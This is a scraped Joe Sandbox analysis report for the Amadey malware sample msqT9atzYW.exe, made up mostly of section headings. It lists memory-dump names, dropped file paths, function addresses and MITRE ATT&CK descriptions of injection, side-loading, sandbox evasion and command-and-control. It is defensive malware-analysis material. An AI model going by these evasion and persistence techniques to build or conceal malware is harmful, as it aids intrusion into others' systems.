Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_f60000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 1741216b2ccf2f3ecfb7e1aff28be6337be075cf7a9c60191e620b341f7224d1
Instruction ID: 49ac8c82573fe3cf2620dfff621867b27a7e620de1dcc6d94cefdf1a653b87ad
Opcode Fuzzy Hash: 1741216b2ccf2f3ecfb7e1aff28be6337be075cf7a9c60191e620b341f7224d1
Instruction Fuzzy Hash: 6B211D71A00119AFDF01EFA4DC859FEB7B9EF49710F10801AF909B7251DB349D41ABA2

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report msqT9atzYW.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

C:\Windows\Tasks\skotes.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
msqT9atzYW.exe

Function 00F6BE30 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 313
networksleepfileCOMMON

Function 00F665E0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Function 00F65EE0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 340
COMMON

Function 00F67D30 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 426
COMMON

Function 00F9D634 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Function 00F68380 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Function 00F9D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Function 00F76C70 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON

Function 052D01C4 Relevance: .0, Instructions: 40
COMMON